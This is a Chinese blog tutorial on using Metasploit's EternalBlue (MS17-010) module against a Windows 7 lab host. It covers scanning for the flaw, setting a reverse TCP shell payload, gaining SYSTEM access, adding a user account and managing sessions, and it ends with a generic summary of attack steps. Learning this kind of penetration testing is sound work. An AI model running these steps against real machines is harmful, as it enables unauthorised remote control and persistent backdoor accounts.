实战-使用msf渗透攻击win7主机并远程执行命令

已于 2022-02-04 23:32:57 修改
阅读量2.2k 收藏 28
点赞数 7
文章标签: 安全 web安全 渗透测试 网络安全
于 2022-01-14 21:48:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38612882/article/details/122501985
版权

1.什么是永恒之蓝?

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.通过msf模块获取win7主机远程shell

模块的整体使用流程如下

1.我们先扫描目标是否存在ms17-010漏洞

 2.加载对应的模块

 3.查看需要设置的参数

show options

4.设置目标主机

5.开始扫描,run运行

 如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。

 6.查找攻击模块

 7.加载攻击模块

8.查看需要设置的参数

9.设置目标主机

 10.查看该攻击载荷使用的系统类型show targets

如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。

 11.查看该模块可以使用的攻击载荷 show payloads

 12.选择攻击模块 show windows/x64/shell

 13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp

14.设置本地主机 set LHOST 192.168.0.109

15.查看设置参数

 16.run运行

如图,渗透成功。

17.执行一些命令去测试一下

添加一个账号 

 在win7系统里查看用户。如图,添加成功。

 但是,我们在终端模拟器里看到一些乱码。

 原因是:一个是linux系统,一个是windows系统,编码方式不一样。

解决办法:chcp 65001

 查看我们的权限。

如图,可以看到我们是系统最高权限及root权限。

 终端会话:ctrl+c

 拿到会话后,我们将其保存到后台 exploit -j

 此时,会话保存到后台了。我们输入sessions,进行查看。

 记录会话 sessions -i 4

 退出但不断开这个链接 background

 删除会话 sessions -k 4

 3.总结使用metasploit攻击的步骤

1.查找CVE公布的漏洞

2.查找对应的exploit模块

3.配置模块参数

4.添加payload后门

5.执行exploit开始攻击

保持微笑-泽
关注
  • 7
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
一种基于ARM的航标终端设计方案
01-19
摘要:航标终端是航标遥测遥控系统的重要组成部分,目前在国内技术尚不成熟,尤其是在内河航道上的应用,有诸多亟待改进的地方。文章主要围绕终端的设计思路、部分模块硬件电路设计、航标遥测、嵌入式软件设计等方面本文提出了一种基于ARM的航标终端设计方案,为了使终端更加灵活高效的工作,本方案采用了双CPU架构设计。   0 引言   航标是航行标志的简称,是指示航道方向、界限与碍航物的标志,为船舶的安全航行提供了基本保障。航标终端通过测量航标灯工作状态(电压、电流、可用灯泡数、闪光周期、位置信息等参数),再将这些状态信息以数据报的形式在CPU的控制下通过公共通讯网发送回航标监控中心。同时,监控中心也可
攻防技术第一篇之-知彼(攻击手段)
千寻的博客
07-19 2693
攻防技术中,攻击一些名词解释
在Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
孟俊宇的博客
03-02 669
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
渗透测试工具篇之Metasploit(MSF)框架介绍与基本命令
lzp_5257的博客
04-22 5263
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 前言 我们能够通过它发现漏洞并进行快速实施攻击 Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易的获取、开发并且对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 一、MSF常用模块 Auxiliary 辅助模块:为渗透测试信息搜索提供了大量的辅助模块支持。 Exploits 攻击模块:利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件。 Paylo.
网络攻击工具实战测试,网络攻击类型,攻防实验
xingjian_hh的博客
06-25 2118
采用udp进行dos攻击,发送速率基本为0,接受速率达4mb,电脑推出也是tcp的十倍。 经各个平台查询也没有找到明确的发送速率为零的原因,我感觉可能有两个原因: 1、可以类比成一家饭店,只有三十个位置,突然闯进30000个人,导致每个人占到座位的效率大幅降低。 2、接收数据流占满信道,发送数据流难以通过信道。
msf 渗透基础篇(基本命令)
失心少年
07-30 2078
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
使用MSF渗透攻击win7主机远程执行命令
weixin_43991459的博客
06-15 2989
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用攻击载荷 若失败将靶机
渗透实战】通过msf模块获取win7主机远程shell
yummy11111的博客
03-25 1078
渗透学习
使用msf工具对安卓手机进行渗透攻击———超详细
weixin_71669458的博客
07-28 9428
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
使用 msf 渗透攻击 win7 主机远程执行命令
枫梓林のBlog
04-21 3370
使用 msf 渗透攻击 win7 主机远程执行命令 文章目录使用 msf 渗透攻击 win7 主机远程执行命令一、扫描局域网存活的主机并判断是否是目标主机1.1 使用 netdiscover 判断该局域网内 IP网段1.2 使用 nmap 扫描 该网段 判断目标主机二、通过Nessus 扫描该主机漏洞三、通过msf模块获取win7主机远程shell总结 实验环境 Win7 旗舰版 SP1 -64 位 kali Linux 2019.1a Nessus 一、扫描局域网存活的主机并判断是否是目标主机
[网络安全 渗透实验 01]基于MSF框架渗透攻击Win7主机系统的设计与实现
m0_54524462的博客
02-01 1304
该文章仅供网络安全相关爱好者和学习者学习使用
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
[ MSF ] Meterpreter扩展模块命令详解
区块链安全应用----压力测试
2201_76041915的博客
04-17 952
有一个临时的解决方案,进入node_modules/@hyperledger/caliper-fisco-bcos目录,编辑该目录下的package.json文件,在"dependencies"中添加一项"secp256k1": “^3.8.0”,随后在该目录下执行npm i,更新完成后测试程序就能启动了。变动文件二:绿色为新增的代码,红色为源代码,需要删除。在部署完成后,可以通过。:用于指定需要测试的区块链平台,即受测系统(***S***ystem ***u***nder ***T***est);
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 815
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
跨境电商测评攻略:如何安全有效地提升业绩?
最新发布
zcwz888的博客
04-23 214
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
kali使用msf攻击win xp错误
05-18
很遗憾,您提供的信息太少了,我无法确定您遇到了什么错误。但是,通常在使用Metasploit Framework(MSF攻击Windows XP时可能会出现各种错误。这可能涉及到网络连接问题、操作系统配置问题、MSF模块问题或其他问题。以下是您可能要考虑的一些常见问题和解决方法: 1. 确保Windows XP系统已经被漏洞利用程序所支持,并且系统已经被正确地配置,以便接受连接。 2. 确保你的Kali机器和Windows XP系统在同一网络中,并且能够相互通信。 3. 确保你的MSF版本是最新的,并且所有需要的模块都已经安装。 4. 确保你的payload是正确的,并且已经正确地配置。 5. 如果你遇到了错误,请先试着查看MSF的日志文件,以便确定错误的原因。 希望这些信息对您有所帮助。如果您需要更多的帮助,请提供更多的详细信息,我会尽力回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

保持微笑-泽

谢谢鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值